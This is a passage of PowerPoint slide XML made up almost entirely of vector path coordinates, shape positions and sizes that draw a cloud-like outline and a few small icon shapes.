                    <a:pt x="621315" y="1067621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588114" y="1058131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550172" y="1048641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512229" y="1043896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479029" y="1043896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426857" y="1048641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379429" y="1053386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332000" y="1067621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289314" y="1081855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246628" y="1100835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170743" y="1148285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137543" y="1176755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104342" y="1209970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80628" y="1243185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33200" y="1319105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18971" y="1361809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1447219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1542119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18971" y="1627528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33200" y="1670233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80628" y="1746153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104342" y="1779368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137543" y="1812583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170743" y="1841053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208685" y="1864778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246628" y="1893247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289314" y="1907482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332000" y="1926462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379429" y="1935952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426857" y="1940697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479029" y="1945442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507486" y="1945442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540686" y="1940697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540686" y="1983402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545429" y="2011872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545429" y="2040342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554914" y="2068812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559657" y="2092537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578629" y="2149476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592857" y="2173201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607086" y="2201671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678229" y="2296571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744629" y="2358256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792058" y="2396216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844229" y="2429430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901143" y="2457900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962801" y="2481625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024458" y="2500605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090858" y="2514840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128801" y="2519585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162001" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195201" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1233144" y="2529075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271087" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309030" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384915" y="2514840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422858" y="2505350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489258" y="2486370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527201" y="2476880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1555658" y="2462645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1588858" y="2443665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617316" y="2429430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645773" y="2410450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1678973" y="2391471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1702687" y="2372491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731144" y="2353511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754859" y="2329786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773830" y="2353511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797544" y="2381981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821259" y="2400961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849716" y="2424685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1878173" y="2443665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1906630" y="2467390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939830" y="2481625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1977773" y="2500605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015716" y="2514840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2053659" y="2524330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096345" y="2538565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181716" y="2557545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224402" y="2562290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2267088" y="2562290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2314516" y="2567035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376174" y="2562290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433088" y="2557545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2490002" y="2548055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546917" y="2533820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594345" y="2519585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646517" y="2500605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689203" y="2481625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736631" y="2457900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2774574" y="2434175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2807774" y="2400961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840974" y="2372491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2869431" y="2344021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893146" y="2306061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2921603" y="2234886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931089" y="2196926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954803" y="2201671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2973774" y="2206416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3054403" y="2206416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082860" y="2201671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116060" y="2196926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144517" y="2187436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3172975" y="2173201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3220403" y="2144731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239375" y="2121007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3263089" y="2102027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282060" y="2083047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3296289" y="2059322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3305775" y="2030852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320003" y="2007127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329489" y="1978657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="1950187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="1921717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329489" y="1883757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324746" y="1850543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3357946" y="1855288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395889" y="1860033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3429089" y="1864778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3467032" y="1864778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571375" y="1855288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3623547" y="1841053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3670975" y="1826818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718404" y="1807838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761090" y="1784113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3836975" y="1727173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903375" y="1660743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927090" y="1618038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3950804" y="1580079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969776" y="1537374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988747" y="1442474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3993490" y="1395024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988747" y="1347574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3979261" y="1300125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969776" y="1257420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3950804" y="1214715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927090" y="1172010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903375" y="1134050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870175" y="1096090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3836975" y="1062876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3799032" y="1034406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761090" y="1010681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718404" y="982211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3670975" y="963231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3623547" y="948996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571375" y="934761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3467032" y="925271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433832" y="930016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3400632" y="930016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3367432" y="934761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="944251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334232" y="820881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329489" y="782922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324746" y="749707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3315260" y="716492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3305775" y="688022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3296289" y="654807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267832" y="588377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239375" y="531438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3220403" y="502968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3201432" y="479243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3182460" y="450773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3158746" y="427048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139775" y="403323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116060" y="379598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092346" y="360618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3068632" y="336893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011717" y="298933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2926346" y="256229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2864689" y="232504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798288" y="213524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698688" y="199289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665488" y="199289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603831" y="204034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546917" y="208779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2490002" y="227759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433088" y="241994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2328745" y="289443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286059" y="322658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2238631" y="355873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191202" y="279953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162745" y="246739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134288" y="208779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2067888" y="151839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029945" y="123369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987259" y="94899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944573" y="75919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1906630" y="56939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1859202" y="37959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816516" y="23724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769087" y="9489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674230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9BDAAA59-9D1F-4698-CF0D-2527D4C7DEA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8000" y="2271985"/>
              <a:ext cx="3761090" cy="2358256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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2329AB60-CD1F-4528-85AD-C4CBAFEE81E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4686" y="2189714"/>
              <a:ext cx="4050531" cy="2616199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15AACFEB-92DA-38C7-F851-5CA34331C9D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6959" y="3474632"/>
              <a:ext cx="492560" cy="727709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4467C6BB-4F52-1618-FF91-6614C2EC740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090" y="3649166"/>
              <a:ext cx="525124" cy="603045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0090298C-5081-5409-7034-840AF77D25F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6211090" y="3649166"/>
              <a:ext cx="525145" cy="603250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="525145" h="603250">
                  <a:moveTo>
                    <a:pt x="424936" y="562112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="198073" y="603045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103642" y="571336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103642" y="558076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179072" y="543663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179072" y="514260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20152" y="542510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="534439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="89361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504395" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525124" y="8071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525124" y="451995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310928" y="490623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310928" y="520025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329354" y="515990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424936" y="550005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424936" y="562112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C83D4F6A-E416-2126-EE42-C50874BE7A4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3582" y="4150743"/>
              <a:ext cx="320717" cy="102621"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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B8E993FA-9AC6-4C98-50E2-B22820F8629A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6211090" y="3739104"/>
              <a:ext cx="27940" cy="451484"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27939" h="451485">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="440465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27638" y="451419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27638" y="10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81A5D0D7-97C3-9615-1B5E-7A4137B0B212}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6231819" y="3660697"/>
              <a:ext cx="506095" cy="528320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="506095" h="528320">
                  <a:moveTo>
                    <a:pt x="505547" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="89361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="528097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505547" y="438159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5055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868E2ADC-C79F-8D50-0F7A-AB266608F30E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6228652" y="3656914"/>
              <a:ext cx="512445" cy="535940"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="511877" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="90483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="535662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21268" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2612" y="528756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="528094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3717" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="93143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21373" y="93143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="7561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="3782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="3782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="6333" y="528094"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2612" y="528756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="528094"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="505543" y="439286"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6333" y="528094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21268" y="531879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="444601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="439286"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="508161" y="438820"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505543" y="439286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508161" y="438820"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="511877" y="438820"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508161" y="438820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="441941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="438820"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="511877" y="3782"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505543" y="3782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509267" y="6902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="7561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="439286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508161" y="438820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="438820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511877" y="3782"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="6333" y="93143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3717" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="95801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="93143"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="6333" y="95801"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3717" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="96264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="95801"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="21373" y="93143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6333" y="93143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6333" y="95801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21373" y="93143"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="512445" h="535939">
                  <a:moveTo>
                    <a:pt x="505543" y="3782"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505543" y="7561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509267" y="6902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505543" y="378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C451E6CF-BED6-9269-C012-80E3715C435D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6282489" y="3710278"/>
              <a:ext cx="414020" cy="426084"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414020" h="426085">
                  <a:moveTo>
                    <a:pt x="413420" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="73218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="425475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413420" y="351680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413420" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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0" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9857E082-9000-9E36-A0B6-5E3DDDEFD10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2618" y="4112692"/>
              <a:ext cx="107097" cy="94550"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E0CA522A-AA06-00DF-A0B2-60FB239A1B83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6204468" y="3642317"/>
              <a:ext cx="538480" cy="617220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="176189" y="545069"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103639" y="559481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103639" y="582954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204195" y="616720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276867" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206798" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203520" y="603369"/>
                  </a:lnTo>
                  <a:lnTo>
